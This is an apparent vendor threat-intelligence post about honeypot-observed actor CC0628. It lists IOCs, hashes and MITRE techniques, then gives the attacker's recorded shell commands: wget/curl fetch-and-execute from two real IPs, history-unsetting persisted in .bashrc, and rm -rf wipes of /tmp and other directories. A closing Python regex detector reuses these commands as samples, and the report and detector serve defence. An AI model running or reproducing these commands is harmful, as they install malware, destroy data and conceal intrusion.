Over the past year, our team has been gathering intel on new and unusual threat actors to augment the capabilities of our platform. Using our deception technology, we have detected several new threat actors in the wild, some of which we will share weekly, right here. This is the first in a series of posts describing the IOCs and TTPs of the threat actors we have uncovered, so be sure to check back or follow us on LinkedIn for updates.
By placing a decoy machine on a U.S. web server of a well-known provider, with an SSH port open to the outside network, we found many attackers approaching the machine and trying to access it, often by sheer brute force. By giving the machine a deliberately weak username and password, we gave attackers an easy way in, after which we could observe their behavior and TTPs. This relevant and timely threat intelligence allows us to update the threat actor intel in our platform so that all of our clients benefit from the knowledge. It can also be shared with red and blue teams so they know which malware and attackers are compromising machines.
Read on about the first of many threat actors we’re tracking: CC0628.
CC0628
Suspected attribution: Unknown
Risk: Medium
Target sectors: Any host.
Overview: The goal of CC0628 is to scan the Internet for vulnerabilities from a compromised machine, so that the scanning is not reported back to the attacker.
Associated malware: SSHD, MIZAKOTROPISTA86, MIZAKOTROPISTAPS, MIZAKOTROPISTSL, MIZAKOTROPISTAM4, MIZAKOTROPISTAM5, MIZAKOTROPISTAM6, MIZAKOTROPISTAM7, MIZAKOTROPISTAPC, MIZAKOTROPISTA8K, MIZAKOTROPISTAX64, CRATON.PL, ULIMIT.SH
IOCs:
| IP |
|---|
| 192.99.43.212 |
| 144.217.249.55 |
| Filename | Filepath | SHA-256 |
|---|---|---|
| sshd | /tmp/sshd | 97e86c34cd0b678e12edcabf40b16e6c274815f591905eb9e6ec2c97ab9b5f58 |
| mizakotropista86 | /tmp/mizakotropista86 | 50fa1f2735f018b22c86fc6ce546a8c6b9ca730e78d23f5a986f787191398c37 |
| mizakotropistaps | /tmp/mizakotropistaps | 0619b86b6707c97febaae11d75f783ec4b32e88f83f5d55761a0d04f92bea42e |
| mizakotropistasl | /tmp/mizakotropistasl | 0e722a9c17bebf1a84754e4cef108a38cde9763749596d5a4672697ab68eaf67 |
| mizakotropistam4 | /tmp/mizakotropistam4 | 5b1ca59a8e0e9583c4102605264fc29a0cfab84c68b78072a908a5783b441948 |
| mizakotropistam5 | /tmp/mizakotropistam5 | 110ddecda3ce0bd41206fe557550754b4fb21bcd663201253d57f9c291764440 |
| mizakotropistam6 | /tmp/mizakotropistam6 | 447e208fa47057567e828912b23a0927b0c74220e7336e2243ff1541b353157e |
| mizakotropistam7 | /tmp/mizakotropistam7 | f89bb5668bb6b8c46e837e8219e07303b94305bae6faa298ea21feea2b02cd3d |
| mizakotropistapc | /tmp/mizakotropistapc | e762e34fb86167d139a61ecbcc6dfb768ee4cfb7955469ff9fda6e444a60af75 |
| mizakotropista8k | /tmp/mizakotropista8k | 3c128d01635bf9a9b5d3d90ef4a56212554f7a44c579a74aff707455847eb515 |
| mizakotropistax64 | /tmp/mizakotropistax64 | 5d6f674a7abab5e60548531a69e6ecb23cc2e2fe823cd7f8ccac6928db5f757e |
| bash.sh | /tmp/bash.sh | a5e010b0abf603facae5676c2c37f7063f6efc12bc7c863982bff133ec547a3f |
| craton.pl | /tmp/craton.pl | 7046260a23088b52debdeb701032db0352323ed26d9816daa4a53222b26ca720 |
Attack vectors:
CC0628 uses brute force attacks as its initial compromise method.
Once they obtain valid credentials, they download and execute a script called sshd, which in turn downloads and executes further files such as MELITACAFE, MIZAKOTROPISTA86 and CRATON.PL. All of these files have the same content but are compiled for different systems.
Finally, they scan the Internet for vulnerabilities and send all scanned IPs to their server.
MITRE ATT&CK Techniques
Cataloguing the threat actor’s TTPs with MITRE ATT&CK’s matrix can help teams mitigate risk and stop attacks. These are the MITRE ATT&CK techniques that we observed in CC0628’s behavior:
[Figure: MITRE ATT&CK matrix with the matched TTPs highlighted]
Command and Scripting Interpreter – Unix Shell (T1059.004): attackers abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh…) depending on the specific distribution.
Network Service Scanning (T1046): attackers attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.
Indicator Removal on Host – File Deletion (T1070.004): attackers delete files left behind by their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces that indicate what was done within a network and how.
Executed commands:
```
wget 192.99.43.212/sshd -O /tmp/sshd; curl -O 192.99.43.212/sshd -o /tmp/sshd; chmod 777 /tmp/sshd; sh /tmp/sshd; rm -rf /tmp/sshd /tmp/sshd.1; rm -rf *
rm -rf /tmp/mizakotropista*
rm -rf /tmp/melitacafe*
rm -rf mizakotropista*
rm -rf melitacafe*
unset HISTFILE; unset SAVEHIST
echo "unset HISTFILE; unset SAVEHIST" >> ~/.bashrc
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropista86; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropista86;cat mizakotropista86 >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistaps; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistaps;cat mizakotropistaps >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistasl; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistasl;cat mizakotropistasl >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistam4; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistam4;cat mizakotropistam4 >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistam5; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistam5;cat mizakotropistam5 >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistam6; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistam6;cat mizakotropistam6 >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistam7; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistam7;cat mizakotropistam7 >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistapc; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistapc;cat mizakotropistapc >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropista8k; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropista8k;cat mizakotropista8k >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistah4; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistah4;cat mizakotropistah4 >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistax64; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistax64;cat mizakotropistax64 >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/bash.sh; curl http://192.99.43.212/bash.sh -o bash.sh; chmod 777 bash.sh; nohup bash bash.sh &
cd /tmp; wget http://192.99.43.212/craton.pl -O /tmp/craton.pl; curl http://192.99.43.212/craton.pl -o /tmp/craton.pl; chmod 777 /tmp/craton.pl; perl /tmp/craton.pl; rm -rf /tmp/craton.pl; rm -rf /tmp/craton.pl.*
cd /tmp; curl 144.217.249.55/initd -o /tmp/initd; wget 144.217.249.55/initd -O /tmp/initd; chmod 777 /tmp/initd; sh /tmp/initd; rm -rf /tmp/initd; rm -rf /tmp/initd.1
rm -rf /tmp/*
rm -rf /var/tmp/*
```
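As an added example (not code from the original post), the following Python script turns the attack vectors and MITRE ATT&CK observations above into detection logic that runs over recorded shell commands such as the ones listed: it flags history unsetting, fetch-and-execute from /tmp, the melitacafe launch, /tmp cleanup, and references to the report's IOC IPs. The regexes, the T1070 mapping for history clearing, and the constructed sample session are assumptions written against this report's commands.

```python
import re

# IOC IPs taken from the report's IOC table.
IOC_IPS = {"192.99.43.212", "144.217.249.55"}

# (rule name, ATT&CK technique per the report, regex over one shell command line).
# Patterns are assumptions tuned to the commands recorded in this report.
RULES = [
    # Unsetting HISTFILE/SAVEHIST clears shell history (Indicator Removal on Host, T1070 family).
    ("history_unset", "T1070", r"\bunset\s+(?:HISTFILE|SAVEHIST)\b"),
    # wget/curl used together with the /tmp staging directory.
    ("fetch_to_tmp", "T1059.004", r"^(?=.*\b(?:wget|curl)\b)(?=.*(?:\bcd /tmp\b|/tmp/))"),
    # chmod 777 / +x immediately followed by execution via sh, bash, perl or ./ (optionally under nice).
    ("chmod_then_exec", "T1059.004",
     r"\bchmod\s+(?:777|\+x)\b.*(?:;|&&)\s*(?:nice\s+-?\d+\s+)?(?:sh|bash|perl|\./)"),
    # The report identifies melitacafe as the scanner binary (Network Service Scanning).
    ("scanner_launch", "T1046", r"\./melitacafe\b"),
    # Wiping the staging area and dropped binaries (File Deletion).
    ("tmp_wipe", "T1070.004", r"\brm\s+-rf\s+(?:/tmp|/var/tmp|\*|melitacafe|mizakotropista)"),
]
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def analyze(line):
    """Return rule hits, mapped techniques and referenced IOC IPs for one command line."""
    hits = [name for name, _tech, pat in RULES if re.search(pat, line)]
    techniques = sorted({tech for name, tech, _pat in RULES if name in hits})
    ioc_ips = sorted(ip for ip in set(IP_RE.findall(line)) if ip in IOC_IPS)
    return {"hits": hits, "techniques": techniques, "ioc_ips": ioc_ips}


def scan_session(lines):
    """Return (line_number, findings) for every command that trips a rule or names an IOC IP."""
    report = []
    for n, line in enumerate(lines, 1):
        findings = analyze(line)
        if findings["hits"] or findings["ioc_ips"]:
            report.append((n, findings))
    return report


# Constructed session log: one benign command plus three commands from the report.
SAMPLE_SESSION = [
    "ls -la /home",
    "unset HISTFILE; unset SAVEHIST",
    "cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropista86; curl -O "
    "http://192.99.43.212/54545asd5asd45as45/mizakotropista86;cat mizakotropista86 >melitacafe;"
    "chmod +x *;nice -20 ./melitacafe machine",
    "rm -rf /tmp/*",
]

if __name__ == "__main__":
    for n, f in scan_session(SAMPLE_SESSION):
        print(f"line {n}: {f['hits']} -> {f['techniques']} ioc_ips={f['ioc_ips']}")
```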